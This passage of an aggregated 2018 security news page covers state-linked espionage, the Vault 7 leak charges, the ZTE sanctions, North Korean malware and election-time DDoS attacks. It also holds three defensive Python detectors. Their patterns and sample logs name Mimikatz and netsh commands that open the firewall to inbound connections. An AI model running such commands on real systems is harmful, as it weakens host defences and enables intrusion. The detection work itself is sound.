The lawyers argued that a court order should not have been enough to obtain access to the suspect’s mobile location data, and that a search warrant should have been obtained instead.

The Supreme Court ruling was praised by privacy advocates because it defends the privacy of citizens against abuse.

China-Linked 'Thrip' Spies Target Satellite, Defense Companies
20.6.2018 securityweek BigBrothers

A China-linked cyber espionage group has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia, Symantec reported on Tuesday.

Symantec has been tracking the threat actor, which it has named “Thrip,” since 2013. However, the security firm says the group’s activities have not been made public until now.

Thrip has used a combination of custom malware and legitimate tools in its attacks. One victim was a satellite communications operator, where the hackers targeted devices involved in operations, as well as systems running software designed for monitoring and controlling satellites.

“This suggests to us that Thrip’s motives go beyond spying and may also include disruption,” Symantec researchers said.

Thrip has also targeted a company specializing in geospatial imaging and mapping. The attackers attempted to gain access to machines hosting MapXtreme GIS, Google Earth Server and Garmin imaging software.

The list of victims identified by Symantec also includes three telecoms firms in Southeast Asia. The companies themselves appear to have been Thrip’s targets rather than their customers. Another victim is a defense contractor, but no details have been shared by the security firm on this attack.

Symantec has been monitoring Thrip since 2013, when it spotted a campaign conducted from systems located in China. The group initially relied mostly on custom malware, but more recent campaigns, which started last year, also involved legitimate tools.

The pieces of malware used by the group include Trojan.Rikamanu, a trojan designed for stealing credentials and other information from compromised systems, and Infostealer.Catchamas, an evolution of Rikamanu that includes improved data theft and anti-detection capabilities.

Thrip has also been spotted using Trojan.Mycicil, a keylogger offered on Chinese underground marketplaces but which has not been seen often, and Backdoor.Spedear and Trojan.Syndicasec, both of which have been observed in the group’s older campaigns.

As for the legitimate tools used by the cyberspies, the list includes the Windows Sysinternals utility PsExec, PowerShell, the post-exploitation tool Mimikatz, the open source FTP client WinSCP, and the LogMeIn remote access software.

“This is likely espionage,” said Greg Clark, CEO of Symantec. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organizations won’t notice their presence. They operate very quietly, blending in to networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defense companies. We stand ready to work with appropriate authorities to address this serious threat.”
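The article's point is that each of these tools is ordinary administrative software, so no single execution stands out; what a defender can look for is several of them appearing on the same host within a short window. The following is an added example (not Symantec's tooling and not code from the article) that runs that correlation over a handful of constructed process-creation records. The log format, the host and user names, and the image names PSEXESVC.exe and LogMeIn.exe are assumptions for illustration; the article names only the tools, not their executables.

```python
"""Flag hosts on which several of the legitimate tools Symantec ties to Thrip
(PsExec, PowerShell, Mimikatz, WinSCP, LogMeIn) run inside a short time window.
Any one of them is normal admin activity; the combination on one host is not."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Process image names for the tools named in the article, mapped to a tool family.
# The image names are assumptions for illustration; the article only names the tools.
THRIP_TOOLS = {
    "psexec.exe": "PsExec",
    "psexesvc.exe": "PsExec",      # assumed service-side image PsExec drops on the remote host
    "powershell.exe": "PowerShell",
    "mimikatz.exe": "Mimikatz",
    "winscp.exe": "WinSCP",
    "logmein.exe": "LogMeIn",      # assumed client image name
}

# Constructed process-creation records (not real telemetry) in a simple key=value form.
SAMPLE_LOG = r"""
2018-06-19T09:58:12 host=FILESRV01 user=svc_backup image=C:\Program Files\WinSCP\WinSCP.exe
2018-06-19T10:01:40 host=WS-ENG-07 user=alice image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2018-06-19T10:02:05 host=WS-ENG-07 user=alice image=C:\Windows\System32\notepad.exe
2018-06-19T10:14:33 host=SATOPS02 user=ops image=C:\Windows\PSEXESVC.exe
2018-06-19T10:15:02 host=SATOPS02 user=ops image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2018-06-19T10:16:48 host=SATOPS02 user=ops image=C:\Users\ops\AppData\Local\Temp\mimikatz.exe
2018-06-19T10:41:10 host=SATOPS02 user=ops image=C:\Users\ops\Downloads\WinSCP.exe
2018-06-19T13:30:00 host=WS-ENG-07 user=alice image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>.+)$")


def parse_line(line):
    """Return (timestamp, host, user, lower-cased image basename) or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
    image = PureWindowsPath(m["image"]).name.lower()
    return ts, m["host"], m["user"], image


def find_tool_clusters(lines, window=timedelta(hours=1), min_tools=3):
    """Per host, slide a time window over tool executions and report the widest
    set of distinct tool families seen together once it reaches min_tools."""
    per_host = defaultdict(list)            # host -> [(timestamp, tool family)]
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, _user, image = parsed
        tool = THRIP_TOOLS.get(image)
        if tool:
            per_host[host].append((ts, tool))

    alerts = []
    for host, events in per_host.items():
        events.sort()
        best = None
        start = 0
        for end, (ts, _tool) in enumerate(events):
            while ts - events[start][0] > window:   # shrink the window from the left
                start += 1
            tools = {t for _, t in events[start:end + 1]}
            if len(tools) >= min_tools and (best is None or len(tools) > len(best["tools"])):
                best = {"host": host, "tools": sorted(tools),
                        "first": events[start][0], "last": ts}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in find_tool_clusters(SAMPLE_LOG.strip().splitlines()):
        print(f"{alert['host']}: {', '.join(alert['tools'])} "
              f"between {alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}")
```

On the sample data only SATOPS02 is reported, because PsExec, PowerShell, Mimikatz and WinSCP all run there within half an hour, while the lone WinSCP session on the file server and the routine PowerShell use on the engineering workstation stay below the threshold. The window length and the minimum number of distinct tools are the knobs to tune against an environment's normal administrative noise.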

Ex-CIA Employee Charged With Leaking Agency's Hacking Tools
19.6.2018 securityweek BigBrothers

A former employee of the U.S. Central Intelligence Agency (CIA) has been charged with stealing classified national defense information from the agency and sharing it with WikiLeaks.

The Department of Justice announced on Monday that Joshua Adam Schulte, 29, of New York, New York, had been charged in a 13-count indictment. The indictment does not specifically name WikiLeaks, but the media revealed last month that authorities had been preparing to charge Schulte for providing WikiLeaks the CIA hacking tools that were published by the whistleblower organization as part of its Vault 7 leak.

Schulte worked for the NSA for five months in 2010 as a systems engineer. He then joined the CIA, where he worked as a software engineer until November 2016, when he moved to New York City and started working as a software engineer for Bloomberg.

The man reportedly became the main suspect for the Vault 7 leaks one week after WikiLeaks started releasing files. However, when investigators searched his apartment and devices, they uncovered a file sharing server hosting child pornography.

Schulte was charged on three counts of receipt, possession and transportation of child pornography in August 2017 and was released the following month. He was arrested again in December for violating the conditions of his release and he has been in custody ever since.

Schulte has now been charged with illegal gathering of national defense information; illegal transmission of lawfully possessed national defense information; illegal transmission of unlawfully possessed national defense information; unauthorized access to a computer to obtain classified information; theft of Government property; unauthorized access of a computer to obtain information from a Department or Agency of the United States; and causing transmission of a harmful computer program, information, code, or command.

The list of charges also includes making material false statements to representatives of the FBI; obstruction of justice; receipt of child pornography; possession of child pornography; transportation of child pornography; and copyright infringement. If convicted, the man could spend decades behind bars.

The hacking-related charges involve Schulte’s activities inside the CIA’s networks while being employed by the agency.

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Schulte previously pleaded not guilty to the child pornography-related charges, claiming that up to 100 people had access to the server storing illegal content. Investigators, on the other hand, claim they have proof Schulte had been aware of the presence of the files.

As for leaking CIA hacking tools, Schulte told the press last month that the FBI likely suspected him due to the fact that he had left the CIA on poor terms just months before the Vault 7 leak started.

In Trump Rebuke, US Senate Votes to Reimpose Ban on China's ZTE
19.6.2018 securityweek  BigBrothers

The US Senate defied President Donald Trump by voting Monday to overrule his administration's deal with Chinese telecom firm ZTE and reimpose a ban on high-tech chip sales to the company.

Senators added an amendment targeting ZTE into a sweeping, must-pass national defense spending bill that cleared the chamber on an 85-10 vote.

The company has been on life support ever since Washington said it had banned US companies from selling crucial hardware and software components to ZTE for seven years, after staffers violated trade sanctions against Iran and North Korea.

It was fined $1.2 billion for those violations, but earlier this month the Trump administration gave ZTE a lifeline by easing sanctions in exchange for a further $1.4 billion penalty on the company.

The Senate measure nullifies that action, proposing an outright ban on the government buying products and services from ZTE and another Chinese telecoms firm, Huawei.

"We're heartened that both parties made it clear that protecting American jobs and national security must come first when making deals with countries like China, which has a history of having little regard for either," a bipartisan group of senators said.

Hong Kong-listed shares in ZTE plunged more than 20 percent soon after the opening bell on Tuesday. The company has lost around 60 percent of its value since it resumed trading last week after a two-month suspension that followed the initial ban. The lawmakers, who introduced the amendment, include top Democrat Chuck Schumer and Republican Marco Rubio.

Providing $716 billion in funding for national defense for fiscal year 2019 and giving policy guidance to the Pentagon, the bill is not a done deal.

The House of Representatives passed its own version of the measure, and the two chambers must now hash out a compromise.

"It is vital that our colleagues in the House keep this bipartisan provision in the bill as it heads towards a conference," Schumer and Rubio said.

ZTE, which employs 80,000 people, said recently that its major operations had "ceased" after the ban, raising the possibility of its collapse.

Its fiberoptic networks depend on US components and its cheap smartphones sold en masse abroad are powered by US chips and the Android operating system.

DHS, FBI Share Details of North Korea's 'Typeframe' Malware
18.6.2018 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have published another report on the US-CERT website detailing a piece of malware allegedly used by the North Korean government.

A dozen reports have been published by the DHS and the FBI over the past year on the North Korea-linked threat group tracked by the U.S. government as Hidden Cobra. The list of tools detailed by the agencies includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest report describes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples related to the threat, including executable files and malicious Word documents containing VBA macros.

“These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections,” the agencies said.

The alert contains indicators of compromise (IoCs) for each of the files, including a description of their functionality, hashes, IPs, antivirus detections, metadata, and YARA rules.

The goal of the report is to “enable network defense and reduce exposure to North Korean government malicious cyber activity.” However, security experts argued in the past that these types of alerts from government agencies are actually not enough to help improve defenses.

The previous Hidden Cobra report, published on the US-CERT website in late May, attributed the Joanap backdoor trojan and the Brambul worm to the North Korean government.

While it has always denied accusations, experts say North Korea continues to be highly active in cyberspace, with some claiming that the country is even more aggressive than China. Recent attacks attributed to North Korea involved new malware and even zero-day vulnerabilities.

Cyber Attack Aims to Manipulate Mexican Election
18.6.2018 securityweek   BigBrothers

On Wednesday June 13, in the run-up to Mexico's July 1 presidential election, a website operated by the rightist National Action Party (PAN) was taken off-line for several hours by a DDoS attack. The outage occurred at the time of a televised presidential debate, and just following a point at which the PAN candidate held up a placard with the website address claiming it held proof of potential corruption.

PAN secretary Damian Zepeda later suggested that front-running leftist candidate Andres Manuel Lopez Obrador (AMLO) was behind the attack. "The AMLO bots have been activated to try to crash the page debate2018.mx where there are proofs of contracts worth millions given to AMLO's friend," Zepeda wrote on Twitter.

PAN later claimed that the site had been hit by 185,000 visits in 15 minutes, "with the attacks coming mainly from Russia and China." Lopez Obrador denied any involvement in the attack, and laughed off any suggestion of ties with Russia by calling himself 'Andres Manuelovich'.

The source of the DDoS attack is unknown and possibly unknowable -- but it is a reminder of the extent to which the internet can be used to influence or even control public opinion.

The accusations of Russian involvement in both the Trump election in the U.S. and the UK Brexit referendum are still fresh. Perhaps more directly relevant is the controversy over the DDoS attack on the FCC website just as it was gathering public comment on the (then) proposed elimination of the net neutrality rules.

The FCC claimed it had been taken off-line by a DDoS attack. Critics of the FCC plans have suggested it was purposely taken off-line to avoid registering mass public dissent over the FCC rules. If the Mexico event was a direct parallel to these claims, it could suggest that PAN couldn't prove the criticisms it was making, and took down the website itself.

This last possibility is not a serious proposal -- but it illustrates the plausible deniability and difficulty of attribution that comes with cyber activity. The DDoS attack could have been delivered by Russia (because it has a history of interference); by AMLO (to prevent access to his competitor's website); by the U.S. (because it would almost certainly prefer a right-leaning to a left-leaning neighbor); or by PAN itself (as a false flag). Or, of course, none of the above -- a straightforward DDoS attack by cybercriminals.

At this stage, the only thing that is certain is that a DDoS attack did take place in Mexico. Netscout Arbor's analysis of the period shows more than 300 attacks per day in Mexico during the period 12th-13th June -- which is 50% higher than the normal frequency in the country. The largest volumetric DDoS attack targeting Mexico during the week was more than 200 Gbps.

"Political websites are frequent targets of DDoS attacks not only due to the ease of launching attacks, but also due to the desire and capabilities of attackers to impact the election process while staying undiscovered," comments Kirill Kasavchenko, principal security technologist at Netscout Arbor. "Due to the nature of modern DDoS attacks, it is quite easy to launch attacks from third countries utilizing computers and IoT devices infected by malware or using techniques like reflection of DDoS traffic. Tracing down the original source of the attack and the people behind it is problematic not only from a technical, but also from an administrative point of view."

DHS, FBI published a joint alert including technical details of Hidden Cobra-linked ‘Typeframe’ Malware
18.6.2018 securityaffairs BigBrothers

The US DHS and the FBI have published a new joint report that includes technical details of a piece of malware allegedly used by the Hidden Cobra APT.
A new joint report published by the US DHS and FBI has made the headlines; the document details TTPs associated with North Korea-linked threat groups, tracked by the US government as Hidden Cobra.

The US authorities have published the report to reduce the exposure to the activities of North Korea-linked APT groups.

Hidden Cobra’s arsenal includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest joint report describes a piece of malware dubbed “Typeframe”; it covers a total of 11 samples analyzed by the government experts.

The researchers analyzed several executables and weaponized Word documents containing VBA macros.

“DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.” reads the joint report.

“This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim’s firewall to allow incoming connections.”


The security alert includes indicators of compromise (IoCs) for each of the samples analyzed by the experts.

The report includes a description of the functionality for each sample, hashes, IPs, antivirus detections, metadata, and YARA rules.

In May, US authorities published another report on the Hidden Cobra detailing the Joanap backdoor trojan and the Brambul worm.

The only certainty is that North Korea continues to be one of the most aggressive and persistent threat actors in cyberspace.
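Both Typeframe write-ups on this page (this one and the securityweek piece above) quote the joint report's list of capabilities, including the ability to "modify the victim's firewall to allow incoming connections". As an added defender-side illustration, not code from the DHS/FBI report, the following Python detector flags inbound-allow firewall rule creation in process-creation events and raises the severity when the parent process is an Office application, which is what a VBA macro launching the change would look like. The event line format, field layout and sample events are all constructed for this example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed process-creation events, one per line:
#   timestamp|parent image|image|command line
# The format is an assumption for this example, not a real sensor's output.
SAMPLE_EVENTS = r"""
2018-06-18T09:12:01|WINWORD.EXE|cmd.exe|cmd.exe /c netsh advfirewall firewall add rule name="Update Service" dir=in action=allow program="C:\Users\Public\svc.exe"
2018-06-18T09:15:44|services.exe|svchost.exe|svchost.exe -k netsvcs
2018-06-18T10:02:13|explorer.exe|netsh.exe|netsh advfirewall firewall add rule name="Block telnet" dir=in action=block protocol=TCP localport=23
2018-06-18T10:30:00|cmd.exe|netsh.exe|netsh firewall add portopening TCP 4444 svc
2018-06-18T11:00:00|explorer.exe|netsh.exe|netsh advfirewall firewall add rule name="web" dir=out action=allow program="C:\Program Files\app\app.exe"
"""

# netsh invocations that open the host to inbound connections: the current
# 'advfirewall' context (only when dir=in AND action=allow are both present)
# and the legacy 'netsh firewall' context. Block rules and outbound rules
# are deliberately not matched.
INBOUND_ALLOW_PATTERNS = [
    re.compile(
        r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(?=.*\bdir=in\b)(?=.*\baction=allow\b)",
        re.IGNORECASE,
    ),
    re.compile(r"netsh\s+firewall\s+add\s+(allowedprogram|portopening)\b", re.IGNORECASE),
]

# Parents that indicate the command came out of a document (macro) rather than an admin.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts, parent.lower(), image.lower(), cmdline)


def classify(ev: ProcEvent) -> dict | None:
    """Return a finding for an inbound-allow firewall change, else None."""
    if not any(p.search(ev.cmdline) for p in INBOUND_ALLOW_PATTERNS):
        return None
    severity = "high" if ev.parent in OFFICE_PARENTS else "medium"
    return {"ts": ev.ts, "severity": severity, "parent": ev.parent, "cmdline": ev.cmdline}


def scan_events(text: str) -> list[dict]:
    """Run the classifier over every non-empty event line and collect findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            finding = classify(parse_event(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f["severity"], f["ts"], f["parent"], "->", f["cmdline"])
```

On the constructed sample the Office-spawned inbound allow rule is reported as high, the legacy port opening as medium, and the block and outbound rules are ignored.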

Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang
16.6.2018 securityaffairs BigBrothers

Europol announced that several French nationals were arrested in the past year on suspicion of being involved with the notorious Rex Mundi crime gang.
In another success for Europol, the European police agency announced that several French nationals were arrested in the past year on suspicion of being involved with the notorious hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012; it hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).

The hackers used to steal sensitive information from the victims, then they demanded fees for not disclosing the stolen data.

The operation coordinated by Europol was launched in May 2017 after the group targeted a UK-based company. Crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also asked the victim for an additional €210,000 ($240,000) for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eighth in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT) that started exactly one year ago.” reads the announcement published by Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that led to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol continues.

In June 2017, the authorities identified and arrested five suspects, two were arrested in October 2017 and one on May 18, 2018.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer who was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.

Singapore was hit by an unprecedented number of attacks during the Trump-Kim Summit
16.6.2018 securityaffairs BigBrothers

Researchers observed a spike in the number of cyber-attacks targeting Singapore during the Trump-Kim Summit, from June 11 to June 12.
Researchers at F5 Labs have observed a spike in the number of cyber-attacks targeting Singapore from June 11 to June 12, in the wake of the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel.

Experts remarked that Singapore is typically not a top attack destination, and that the spike in the number of attacks coincides with the Trump-Kim Jong-un meeting.

Most of the attacks originated from Russia (88% of overall attacks) and frankly speaking, I’m not surprised due to the importance of the Trump-Kim summit.

According to F5 Labs and Loryka, 97% of all the attacks that originated from Russia from June 11 to June 12 targeted Singapore.

“From June 11 to June 12, 2018, F5 Labs, in concert with our data partner, Loryka, found that cyber-attacks targeting Singapore skyrocketed, 88% of which originated from Russia. What’s more, 97% of all attacks coming from Russia during this time period targeted Singapore.” reads the analysis published by F5 Labs. “We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel.”

The cyber attacks targeted a wide range of systems, from VoIP phones to IoT devices. They began out of Brazil, targeting SIP port 5060 on IP phones, where communications are transmitted in clear text.

After an initial attack that lasted for a couple of hours, researchers observed reconnaissance activity originating from a Russian IP address owned by ASN 49505, operated by Selectel; the scans targeted a variety of ports.

None of the attacks carried malware.

“The number two attacked port was Telnet, consistent with IoT device attacks that could be leveraged to gain access to or listen in on targets of interest.” continues the analysis.

“Other ports attacked include the SQL database port 1433, web traffic ports 81 and 8080, port 7541, which was used by Mirai and Annie to target ISP-managed routers, and port 8291, which was targeted by Hajime to PDoS MikroTik routers.”

Singapore was hit by 40,000 attacks in just 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time.

The experts highlighted that only 8% were exploit attacks, while 92% were reconnaissance scans for potential targets.

Thirty-four percent of the attacks originated from Russia; the list of top attackers also includes China, the US, France, and Italy.


During the summit time frame, Singapore was the top destination of cyber-attacks; it received 4.5 times more attacks than countries like the U.S. and Canada.

SIP port 5060 was targeted 25 times more than Telnet port 23; the attackers were attempting to gain access to insecure communication systems or VoIP servers, and to compromise IoT devices in order to spy on communications.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 Labs concludes.

Trump-Kim Summit Attracts Wave of Cyber-Attacks on Singapore
16.6.2018 securityweek BigBrothers

The number of cyber-attacks targeting Singapore skyrocketed from June 11 to June 12, during the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel, and most of these attacks originated from Russia, F5 Labs reports.

Russia has long been said to keep the United States under a continuous barrage of cyber-attacks, and even attracted a series of sanctions following the hacking aimed at the 2016 presidential election, which was supposedly the doing of state-sponsored Russian threat actors.

Thus, it’s no wonder the Trump-Kim summit earlier this week was targeted as well, but the number of assaults coming from Russia is indeed impressive: 88% of the total number of observed cyber-attacks came from this country. Furthermore, 97% of all the attacks that originated from Russia during the timeframe targeted Singapore, data from F5 Labs and Loryka reveals.

“We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel. The attacks targeted VoIP phones and IoT devices, which appears to be more than a mere coincidence,” F5 says.

The flurry of attacks, the security firm reveals, started out of Brazil by targeting port SIP 5060, the single most attacked port in the timeframe. IP phones use this port to send and receive communications in clear text.

This initial phase, which lasted for only a couple of hours, was followed by reconnaissance scans from the Russian IP address – an IP owned by ASN 49505, operated by Selectel – targeting a variety of ports.

The attacks observed on June 11 and June 12 also targeted the Telnet port, which is normally assaulted in Internet of Things (IoT) incidents. Other targeted ports include SQL database port 1433, web traffic ports 81 and 8080, port 7541 (used by Mirai and Annie to target ISP-managed routers), and port 8291 (previously targeted by Hajime).

During a period of 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time, a total of 40,000 attacks were launched on Singapore. Of these, 92% were reconnaissance scans looking for vulnerable devices, while the remaining 8% were exploit attacks.

“Thirty-four percent of the attacks originated from Russian IP addresses. China, US, France, and Italy round out the top 5 attackers in this period, all of which launched between 2.5 to 3 times fewer attacks than Russia. Brazil, in the sixth position, was the only other country we detected launching SIP attacks alongside Russia,” F5 reveals.

During the period, Singapore became the top destination of cyber-attacks by a large margin, receiving 4.5 times more attacks than the U.S. or Canada. Typically, Singapore is not a top attack destination, and the anomaly coincides with President Trump’s meeting with Kim Jong-un.

While Russia was the main source of attacks, accounting for 88% of them, Brazil was the second largest attacker, launching 8% of the assaults. Germany rounded out the top three attackers, with 2%.

The security researchers also note that there was no attempt made to conceal the attacks launched from Russia and that none of the attacks originating from this country carried malware.

The SIP port 5060 received 25 times more attacks than Telnet port 23, which was the second most targeted. Although attacks on port 5060 are unusual, chances are that the attackers were attempting to gain access to insecure phones or perhaps the VoIP server. The attacks on Telnet were likely trying to compromise IoT devices to spy on communications and collect data.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 concludes.
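Both write-ups of the F5 Labs / Loryka analysis on this page (this one and the securityaffairs version above) report the same kind of breakdown: the share of attacks per source country, how much of the top source's activity was aimed at one destination, the scan-versus-exploit proportion, the port mix, and a destination receiving several times its usual volume. As an added example, not F5's or Loryka's code, this Python script computes those figures from constructed sensor records in an assumed key=value line format, with a constructed per-country baseline to detect the spike.

```python
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass

# Ports called out in the F5 Labs analysis and what traffic to them usually means.
PORT_LABELS = {
    5060: "SIP (VoIP signalling, cleartext)",
    23: "Telnet (IoT device logins)",
    1433: "MSSQL",
    81: "HTTP alternate",
    8080: "HTTP alternate",
    7541: "ISP-managed router port (Mirai/Annie)",
    8291: "MikroTik Winbox (Hajime)",
}

# Constructed sensor records, one per observed connection attempt. The format
# (timestamp followed by key=value fields) is an assumption for this example.
SAMPLE_LOG = "\n".join(
    f"2018-06-11T23:01:{10 + i} src_cc=RU dst_cc=SG dport=5060 kind=scan" for i in range(10)
) + """
2018-06-12T01:30:00 src_cc=RU dst_cc=SG dport=23 kind=exploit
2018-06-11T22:50:00 src_cc=BR dst_cc=SG dport=5060 kind=scan
2018-06-12T03:00:00 src_cc=CN dst_cc=SG dport=1433 kind=scan
2018-06-12T04:00:00 src_cc=RU dst_cc=US dport=8080 kind=scan
2018-06-12T05:00:00 src_cc=CN dst_cc=US dport=23 kind=exploit
2018-06-12T06:00:00 src_cc=DE dst_cc=CA dport=8291 kind=scan
"""

# Constructed "normal day" attack counts per destination country, used to spot a spike.
BASELINE = {"SG": 2, "US": 2, "CA": 1}


@dataclass(frozen=True)
class Record:
    ts: str
    src_cc: str   # source country code
    dst_cc: str   # destination country code
    dport: int    # destination port
    kind: str     # "scan" (reconnaissance) or "exploit" (payload delivered)


def parse_line(line: str) -> Record:
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return Record(ts, kv["src_cc"], kv["dst_cc"], int(kv["dport"]), kv["kind"])


def parse_log(text: str) -> list[Record]:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def profile_destination(records: list[Record], dst_cc: str) -> dict | None:
    """Break down the attacks on one destination the way the F5 write-up does."""
    hits = [r for r in records if r.dst_cc == dst_cc]
    if not hits:
        return None
    sources = Counter(r.src_cc for r in hits)
    ports = Counter(r.dport for r in hits)
    kinds = Counter(r.kind for r in hits)
    top_src, top_src_hits = sources.most_common(1)[0]
    # How much of the top source's activity (against every destination) was aimed here.
    top_src_total = sum(1 for r in records if r.src_cc == top_src)
    telnet = ports.get(23, 0)
    return {
        "total": len(hits),
        "top_source": top_src,
        "top_source_share": top_src_hits / len(hits),
        "top_source_focus": top_src_hits / top_src_total,
        "scan_share": kinds["scan"] / len(hits),
        "top_ports": [(p, n, PORT_LABELS.get(p, "unknown")) for p, n in ports.most_common(3)],
        # SIP-to-Telnet ratio; infinite when Telnet was not touched at all.
        "sip_to_telnet": ports.get(5060, 0) / telnet if telnet else float("inf"),
    }


def spiking_destinations(records: list[Record], baseline: dict[str, int], factor: float = 4.5) -> list[str]:
    """Destinations that received at least `factor` times their baseline volume."""
    by_dst = Counter(r.dst_cc for r in records)
    return sorted(cc for cc, n in by_dst.items() if baseline.get(cc) and n / baseline[cc] >= factor)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print(profile_destination(recs, "SG"))
    print("spiking:", spiking_destinations(recs, BASELINE))
```

Destinations with no baseline entry are never flagged, which is the safe default for a country the sensor has not seen enough of to judge.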

French Nationals Arrested for 'Rex Mundi' Hacks
16.6.2018 securityweek BigBrothers

Europol announced this week that several French nationals were arrested in the past year on suspicion of being involved with Rex Mundi, a group that hacked into the systems of several organizations and attempted to blackmail them.

According to Europol, the alleged members of the hacker group were identified after in May 2017 they targeted a UK-based company. The cybercriminals stole significant amounts of customer data from the firm and demanded the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not making the stolen files public or more than €825,000 ($776,000) for information on how the attack was carried out. The hackers also told the victim that the amounts would increase by €210,000 ($240,000) for each day the payment was delayed.

After the victim reported the attack to law enforcement, the UK’s Metropolitan Police, the French National Police and Europol teamed up to identify the hackers. “Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol said.

Five suspects were arrested in June 2017, two were arrested in October 2017 and one was apprehended on May 18, 2018. All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The individual who was arrested last month by the Royal Thai Police is a 25-year-old developer. The suspects arrested in October 2017 were described as “hackers.” The “main suspect,” as Europol describes him, admitted blackmailing companies, but claimed to have used the dark web to hire someone to conduct the hacking.

Rex Mundi was active since at least 2012 and until 2015 it made many of its operations public in hopes of convincing victims to pay up. Its victims included AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE). Many of the hacker group’s victims were Belgian companies.

European Parliament Votes to Ban Kaspersky Products
14.6.2018 securityweek BigBrothers  

Kaspersky Suspends Collaboration With Europol and NoMoreRansom

Kaspersky Lab has suspended its collaboration with Europol and the NoMoreRansom initiative after the European Parliament passed a resolution that describes the company’s software as being “malicious.”

